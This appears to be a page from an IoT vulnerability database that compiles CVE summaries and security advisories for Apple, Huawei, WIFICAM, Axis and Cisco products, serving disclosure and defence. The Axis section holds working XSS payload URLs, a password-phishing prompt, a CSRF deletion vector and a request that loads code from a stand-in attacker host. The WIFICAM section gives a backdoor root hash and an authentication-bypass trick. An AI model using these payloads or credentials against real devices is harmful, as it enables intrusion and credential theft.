VARIoT IoT vulnerabilities database

An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app. Apple macOS Vulnerabilities exist in the kernel component that prevent memory read restrictions.An attacker could bypass the memory read limit through a crafted application. Apple macOS High Sierra is a set of dedicated operating systems developed by Apple (Apple) for Mac computers. A security vulnerability exists in the Kernel component of Apple macOS High Sierra prior to 10.13.2

An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "CFNetwork Session" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. This vulnerability allows remote attackers to escalate privileges on vulnerable installations of Apple Safari. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the handling of ResourceRequest objects. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code under the context of the user. Apple iOS is an operating system developed for mobile devices; Safari is a web browser that is the default browser included with Mac OS X and iOS operating systems. CFNetwork Session is one of the session components of CFNetwork (a C-based underlying framework, an extension of BSD sockets). The following products and versions are affected: Apple iOS prior to 11.2; macOS High Sierra prior to 10.13.2; Windows-based iCloud prior to 7.2; Windows-based iTunes prior to 12.7.2; tvOS prior to 11.2; watchOS prior to 4.2 Version

An issue was discovered in certain Apple products. macOS before 10.13.1 is affected. The issue involves the "Security" component. It allows attackers to execute arbitrary code in a privileged context via a crafted app. Apple macOS High Sierra is a set of dedicated operating systems developed by Apple (Apple) for Mac computers. A security vulnerability exists in the Security component of Apple macOS High Sierra prior to 10.13.1

An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "CoreAnimation" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. This vulnerability allows local attackers to escalate privileges on vulnerable installations of Apple iOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the backboardd service. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this in conjunction with other vulnerabilities to execute code under the context of root. Apple iOS, macOS High Sierra, tvOS, and watchOS are all products of Apple Inc. in the United States. Apple iOS is an operating system developed for mobile devices; macOS High Sierra is a dedicated operating system developed for Mac computers; tvOS is a smart TV operating system; watchOS is a smart watch operating system. CoreAnimation is one of the animation processing API components. The following products and versions are affected: Apple iOS prior to 11.2; macOS High Sierra prior to 10.13.2; tvOS prior to 11.2; watchOS prior to 4.2

An issue was discovered in certain Apple products. Xcode before 9.2 is affected. The issue involves the "ld64" component. A buffer overflow allows remote attackers to execute arbitrary code via crafted source code. Apple Xcode is an integrated development environment provided by Apple (Apple) to developers. It is mainly used to develop applications for Mac OS X and iOS. ld64 is one of the linker components. A buffer overflow vulnerability exists in the ld64 component of Apple Xcode prior to 9.2

An issue was discovered in certain Apple products. iOS before 11.2 is affected. tvOS before 11.2 is affected. The issue involves the "App Store" component. It allows man-in-the-middle attackers to spoof password prompts. in the United States. Apple iOS is an operating system developed for mobile devices. tvOS is a smart TV operating system

An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. Apple macOS High Sierra is a dedicated operating system developed by Apple for Mac computers

An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "IOKit" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. This vulnerability allows local attackers to escalate privileges on vulnerable installations of Apple iOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the backboardd service. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute code under the context of root. Apple iOS/WatchOS/tvOS/macOS are prone to a memory-corruption vulnerability. Failed exploit attempts will result in a denial-of-service condition. Apple iOS, macOS High Sierra, tvOS, and watchOS are all products of Apple Inc. in the United States. Apple iOS is an operating system developed for mobile devices; macOS High Sierra is a dedicated operating system developed for Mac computers; tvOS is a smart TV operating system. watchOS is a smart watch operating system. IOKit is one of the components that read system information. The following products and versions are affected: Apple iOS prior to 11.2; macOS High Sierra prior to 10.13.2; tvOS prior to 11.2; watchOS prior to 4.2

The permission control module in Huawei Document Security Management (aka DSM) before V100R002C05SPC670 allows remote authenticated users to obtain sensitive information from encrypted documents by leveraging incorrect control of permissions on the PrintScreen button. Huawei Document Security Management (DSM) is a set of document rights management software from Huawei, China. The software is characterized by high stability, reliability and scalability. Security vulnerabilities exist in the permission control function of Huawei DSM versions earlier than V100R002C05SPC670. A remote attacker could exploit this vulnerability to obtain sensitive information in encrypted documents

An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of HTMLButtonElement objects. By performing actions in JavaScript, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process. Apple iOS is an operating system developed for mobile devices; iCloud for Windows is a cloud service based on the Windows platform; iTunes for Windows is a set of media player applications based on the Windows platform. WebKit is one of the web browser engine components. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201803-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebKitGTK+: Multiple Vulnerabilities Date: March 22, 2018 Bugs: #645686 ID: 201803-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to arbitrary code execution. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.18.6 >= 2.18.6 Description =========== Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. Workaround ========== There is no known workaround at this time. Resolution ========== All WebKitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.18.6" References ========== [ 1 ] CVE-2017-13884 https://nvd.nist.gov/vuln/detail/CVE-2017-13884 [ 2 ] CVE-2017-13885 https://nvd.nist.gov/vuln/detail/CVE-2017-13885 [ 3 ] CVE-2017-7153 https://nvd.nist.gov/vuln/detail/CVE-2017-7153 [ 4 ] CVE-2017-7160 https://nvd.nist.gov/vuln/detail/CVE-2017-7160 [ 5 ] CVE-2017-7161 https://nvd.nist.gov/vuln/detail/CVE-2017-7161 [ 6 ] CVE-2017-7165 https://nvd.nist.gov/vuln/detail/CVE-2017-7165 [ 7 ] CVE-2018-4088 https://nvd.nist.gov/vuln/detail/CVE-2018-4088 [ 8 ] CVE-2018-4089 https://nvd.nist.gov/vuln/detail/CVE-2018-4089 [ 9 ] CVE-2018-4096 https://nvd.nist.gov/vuln/detail/CVE-2018-4096 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201803-11 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . ========================================================================== Ubuntu Security Notice USN-3551-1 January 30, 2018 webkit2gtk vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 17.10 - Ubuntu 16.04 LTS Summary: Several security issues were fixed in WebKitGTK+. Software Description: - webkit2gtk: Web content engine library for GTK+ Details: Multiple security issues were discovered in the WebKitGTK+ Web and JavaScript engines. (CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160, CVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 17.10: libjavascriptcoregtk-4.0-18 2.18.6-0ubuntu0.17.10.1 libwebkit2gtk-4.0-37 2.18.6-0ubuntu0.17.10.1 Ubuntu 16.04 LTS: libjavascriptcoregtk-4.0-18 2.18.6-0ubuntu0.16.04.1 libwebkit2gtk-4.0-37 2.18.6-0ubuntu0.16.04.1 This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any applications that use WebKitGTK+, such as Epiphany, to make all the necessary changes. References: https://www.ubuntu.com/usn/usn-3551-1 CVE-2017-13884, CVE-2017-13885, CVE-2017-7153, CVE-2017-7160, CVE-2017-7161, CVE-2017-7165, CVE-2018-4088, CVE-2018-4096 Package Information: https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.6-0ubuntu0.17.10.1 https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.6-0ubuntu0.16.04.1 . ------------------------------------------------------------------------ WebKitGTK+ Security Advisory WSA-2018-0002 ------------------------------------------------------------------------ Date reported : January 24, 2018 Advisory ID : WSA-2018-0002 Advisory URL : https://webkitgtk.org/security/WSA-2018-0002.html CVE identifiers : CVE-2018-4088, CVE-2018-4089, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160, CVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885. Several vulnerabilities were discovered in WebKitGTK+. Credit to Jeonghoon Shin of Theori. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to OSS-Fuzz. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Jerry Decime. Impact: Visiting a malicious website may lead to user interface spoofing. Description: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic. Credit to Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Mitin Svyat. Description: A command injection issue existed in Web Inspector. This issue was addressed through improved escaping of special characters. Credit to 360 Security working with Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to 360 Security working with Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to 360 Security working with Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases. Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html The WebKitGTK+ team, January 24, 2018

WirelessIPCamera (P2P) WIFICAM is a wireless IP camera. WirelessIPCamera (P2P) WIFICAM Remote Command Execution Vulnerability. A remote command execution vulnerability exists in the inset_ftp.cgi in the FTP Configuration Common Gateway Interface (CGI). An attacker can use the ftp administrator to perform remote command execution and further gain root privileges on the network device.

WirelessIPCamera (P2P) WIFICAM is a wireless IP camera. WirelessIPCamera (P2P) WIFICAM pre-authorization remote command execution vulnerability. By accessing a URL link with special parameters, an attacker can bypass the authentication process and execute various code on the camera with root privileges.

WirelessIPCamera (P2P) WIFICAM is a wireless IP camera. WirelessIPCamera (P2P) WIFICAMRSA Key and Certificate Disclosure Vulnerability. /system/www/pem/ck.pem contains an Applecertificate with a private RSA key that an attacker can exploit to obtain sensitive information.

WirelessIPCamera (P2P) WIFICAM is a wireless IP camera. WirelessIPCamera (P2P) WIFICAM pre-authorization information and credential disclosure vulnerability. When accessing the server configuration file, by providing blank \"loginuse\" and \"loginpas\" parameters, the attacker can bypass the device's authentication program and download the device's configuration file without logging in, resulting in the leaked device's credential information, and FTP and SMTP account content.

WirelessIPCamera (P2P) WIFICAM is a wireless IP camera. The WirelessIPCamera (P2P) WIFICAM 'Cloud' feature has a design flaw vulnerability. The camera provides a \"Cloud\" feature that is enabled by default and allows consumers to bypass the NAT and firewall using a clear text UDP channel through the network management device. Attackers can use this feature to launch brute-forceattacks to guess the credential information of the device.

Wireless IP Camera (P2P) WIFICAM is a wireless IP camera. Wireless IP Camera (P2P) WIFICAM has a backdoor vulnerability. Telnet runs by default, and the attacker can log in with the following account password: root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh,

WirelessIPCamera (P2P) WIFICAM is a wireless IP camera. WirelessIPCamera (P2P) WIFICAM is not authorized to access the vulnerability. The attacker can access the camera's built-in RTSP server through port 10554 and watch the live video without authentication.

Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. I. technical details ----------------- ** STORED XSS # 1 Attacker injects a javascript payload in the vulnerable page (using some social enginner aproach): http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script type="text/javascript>prompt("AXIS_PASSWORD:")</script> This will generate an error like this on page: " Error processing XML: Incorrect formatting line number 2, column 60: <error type = "No_such_application" message = "No application" '<script type="text/javascript>prompt("AXIS_PASSWORD:")</script>' ----------------------------------------------------------------^ " and also will create a entry in the genneral log file (/var/log/messages) with the JSPayload: " <INFO > Apr 11 10:08:45 axis-eac8c03d901 vaconfig.cgi: Could not find application '<script type="text/javascript>prompt("AXIS_PASSWORD:")</script>' " When the user is viewing the log 'system options' -> 'support' -> 'Logs & Reports': http://{axishost}/axis-cgi/admin/systemlog.cgi?id the JSPayload will be interpreted by the browser and the Javascript prompt method will be executed showing a prompt asking user for the password ('AXIS_PASSWORD'). * With this vector an attacker is able to perfome many attacks using javascript, for example to hook users browser, capture users cookie, performe pishing attacks etc. However, due to CSRF presented is even possible to perform all actions already presented: create, edit and remove users and applications, etc. For example, to delete an application "axis_update" via SXSS: http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http:// axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script> A reflected cross-site scripting affects all models of AXIS devices on the same parameter: http:// {axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!-- # Other Vectors http:// {axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs" onerror=alert(7) /><!-- http://{axishost}/admin-bin/editcgi.cgi?file=<script>alert(1)</script> http:// {axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E http:// {axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script> # SCRIPTPATHS: {HTMLROOT}/showReport.shtml {HTMLROOT}/config.shtml {HTMLROOT}/incl/top_incl.shtml {HTMLROOT}/incl/popup_header.shtml {HTMLROOT}/incl/page_header.shtml {HTMLROOT}/incl/top_incl_popup.shtml {HTMLROOT}/viewAreas.shtml {HTMLROOT}/vmd.shtml {HTMLROOT}/custom_whiteBalance.shtml {HTMLROOT}/playWindow.shtml {HTMLROOT}/incl/ptz_incl.shtml {HTMLROOT}/view.shtml {HTMLROOT}/streampreview.shtml Impact ------ allows to run arbitrary code on a victim's browser and computer if combined with another flaws in the same devices. solution -------- It was not provided any solution to the problem. Credits ------- The vulnerability has been discovered by SmithW from OrwellLabs Legal Notices ----------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. About Orwelllabs ++++++++++++++++ doublethinking..

AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a "resource injection vulnerability.". AXISCommunications is a webcam. A cross-site scripting vulnerability exists in AXIS communications, allowing an attacker to exploit a vulnerability to inject arbitrary web scripts or HTML. Axis Communications is a network camera product of Axis, Sweden. 0RWELLL4BS ********** security advisory olsa-2015-8258 PGP: 79A6CCC0 @orwelllabs Advisory Information ==================== - Title: ImagePath Resource Injection/Open script editor - Vendor: AXIS Communications - Research and Advisory: Orwelllabs - Class: Improper Input Validation [CWE-20] - CVE Name: CVE-2015-8258 - Affected Versions: Firmwares versions <lt 5.80.x - IoT Attack Surface: Device Administrative Interface/Authentication/Autho rization - OWASP IoTTop10: I1, I2 Technical Details ================= The variable "imagePath=" (that is prone to XSS in a large range of products) also can be used to resource injection intents. If inserted a URL in this variable will be made an GET request to this URL, so this an interesting point to request malicious codes from the attacker machine, and of course, the possibilities are vast (including hook the browser). An attacker sends the following URL for the current Web user interface of the camera: http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0 st.com/evilcode.html This request will be processed normally and will return the status code 200 (OK): [REQUEST] GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1 Host: {axisvulnhost} User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX", nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb", uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html", response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth, nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs" Connection: keep-alive GET /evilcode.html HTTP/1.1 Host: www.3vilh0st.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0 st.com/evilcode.html Connection: keep-alive The server response can be seen below (with the clipping of the affected HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"): <table border="0" cellpadding="3" cellspacing="3"> <tr> <td id="videoStreamTable"> <script language="JavaScript"> <!-- video('http://www.3vilh0st.com/evilcode.html'); // --> </script> </td> </tr> </table> [..SNIP..] function listVideoSources() { var formInt = document.listFormInt; var formExt = document.listFormExt; var formCrop = document.listFormCrop; var presetForm = document.listFormPreset; var form = document.WizardForm var currentPath = 'http://www.3vilh0st.com/evilcode.html'; var imageSource; [..SNIP..] var reload = false; reload |= (other != null && other.search("seq=yes") >= 0); reload |= (other != null && other.search("streamprofile=") >= 0); reload |= ((other == null || (other != null && other.search("streamprofile= ;)(r") == -1)) && ('' != "")); reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html'); [..SNIP..] <script SRC="/incl/activeX.js?id=69"></script> </head> <body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0" marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html', '1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize=""> <script language="JavaScript"> [..SNIP..] // Draw the scale buttons var currentResolution = 0 var width = 0 var height = 0 var imagepath = "http://www.3vilh0st.com/evilcode.html" var resStart = imagepath.indexOf("resolution=") if (resStart != -1) { var resStop = imagepath.indexOf("&", resStart) [..SNIP..] =================== view.shtml snips ===================== 447 function zoom(size) 448 { 449 var url = document.URL; 450 451 if (url.indexOf("?") == -1) { 452 url += "F?size=" + size 453 } else if (url.indexOf("size=") == -1) { 454 url += "&size=" + size 455 } else { 456 var searchStr = "size=<!--#echo var="size" option="encoding:javascript" -->" 457 var replaceStr = "size=" + size 458 var re = new RegExp(searchStr , "g") 459 url = url.replace(re, replaceStr) 460 } 461 462 document.location = url; 463 } 464 465 var aNewImagePath; 466 467 function reloadPage() 468 { 469 document.location = aNewImagePath; 470 } 471 [ SNIP ] 567 aNewImagePath = '/view/view.shtml?id=<!--#echo var="ssi_request_id" option="encoding:url" -->&imagePath=' + escape(imagePath) + size; 568 if (other != null) 569 aNewImagePath += other; 570 <!--#if expr="$ptzpresets = yes" --> 571 /* append preset parameters so that preset postion is selected in drop down list after reload */ 572 if (presetName != '') 573 aNewImagePath += "&gotopresetname=" + escape(presetName); 574 else if (gotopresetname != '') 575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname); 576 577 if( newCamera != '') 578 aNewImagePath += "&camera=" + escape(newCamera); ---*--- Some legitimate resources can be very interesting to cybercriminals with your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case there are some resources, like the "Open Script Editor". By this resource the user can edit any file in the operation system with root privileges, because everything (in the most part of IoT devices) runs with root privileges, this is other dangerous point to keep in mind. > Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting' Well, one can say that this feature is restricted to the administrator of the camera, and this would be true if customers were forced to change the default password during setup phase with a strong password policy, since change "pass" to "pass123" does not solve the problem. The aggravating factor is that there are thousands of products available on the internet, running with default credentials. Vendor Information, Solutions and Workarounds +++++++++++++++++++++++++++++++++++++++++++++ According to the manufacturer, the resource injection vulnerability was fixed in firmware 5.60, but we identified that the problem still occurred in 5.80.x versions of various product models. Check for updates on the manufacturer's website. About Open Script Editor,It was considered that in order to have access to this feature, it is necessary to be authenticated as an admin, but if there is no policy that forces the client to change the password during the product setup (ease vs. security) and also requires a password complexity, having an administrative credential to abuse the functionality is not exactly an impediment (e.g: botnets that bring embedded in the code a relation of default credentials for that type of device) Credits ======= These vulnerabilities has been discovered and published by Orwelllabs. Legal Notices ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information. About Orwelllabs ================ https://www.exploit-db.com/author/?a=8225 https://packetstormsecurity.com/files/author/12322/

A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893. Vendors have confirmed this vulnerability Bug ID CSCvd48893 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. Multiple Rockwell Automation products are prone to a remote code-execution vulnerability. Successful exploits will result in the execution of arbitrary code with elevated privileges. Failed exploit attempts may result in a denial-of-service condition. The following products are vulnerable: Allen-Bradley Stratix 5400 Industrial Ethernet Switches versions 15.2(5)EA.fc4 and prior. Allen-Bradley Stratix 5410 Industrial Distribution Switches versions 15.2(5)EA.fc4 and prior. Allen-Bradley Stratix 5700 Industrial Managed Ethernet Switches versions 15.2(5)EA.fc4 and prior. Allen-Bradley ArmorStratix 5700 Industrial Managed Ethernet Switches versions 15.2(5)EA.fc4 and prior. Allen-Bradley Stratix 8300 Modular Managed Industrial Ethernet Switches versions 15.2(4a)EA5 and prior. Cisco Catalyst Switches are all switch products of Cisco (Cisco). Cisco will release software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp"] -----BEGIN PGP SIGNATURE----- iQKBBAEBAgBrBQJYzAjfZBxDaXNjbyBTeXN0ZW1zIFByb2R1Y3QgU2VjdXJpdHkg SW5jaWRlbnQgUmVzcG9uc2UgVGVhbSAoQ2lzY28gUFNJUlQga2V5IDIwMTYtMjAx NykgPHBzaXJ0QGNpc2NvLmNvbT4ACgkQrz2APcQAkHm3jRAAzLR1b6oQbXCkv0yQ GpiGyo0l97V74L+99IvzJzibQrNr/7oFNVc0Sm0SWtGJwhBdIFWKKp7tpfxLFUYw QpgpmOQHfu70kajINv5hshpKReIT2lnUhmAiK0VQzxp8QY/3WboSTjEYLOTmFHHh xb3dNWmvGYiT9tuSvQ70AkMnl2EfU+P+pkucjcku4Vi5Jri7BIIIPjz1by16Juh+ tIB5elmrFOFF/WGRERLo/a3anNlnoszoJxu+m57uS8CYICTnqJKeDEinpm64j0IB 7dWi1qqDTx9973zsmcqUZqeY9kSwierDJW5cii49GrOFOHUeJ9eWCOogEnE1+U4G iz7cJHsQ4qqBF39PBTMlxtY6xjhgGJDkRf3dzJBONH9EfoTpQOFMlO9220/2wlMe SquIU+SY31pW/xHcRfD8NoALZQ5EqrOkbbRXPGe/LwSUcXiFSBL0iMaE/jOPIRRs q6c7lbQr2kay0hTUMovhCvkVUlIC4eJAjwES3vau0EynKlumoYUb2Z7kSAq9QRqU vjHX1Iq+wrh+pM/+GFpx12yJzaDtIrBQSNtB/Jf8p0kNqlja/4Z90DDtwTCTaalR 7hGFyGWo3X3dPBxEL4OcASAaf2uC/J0ozprd0xCS8rsiMfn3rBYWtE6taK88njda 6UdaqFK+zmUBK8rQV0Lu6mOFpOo= =Ql/1 -----END PGP SIGNATURE-----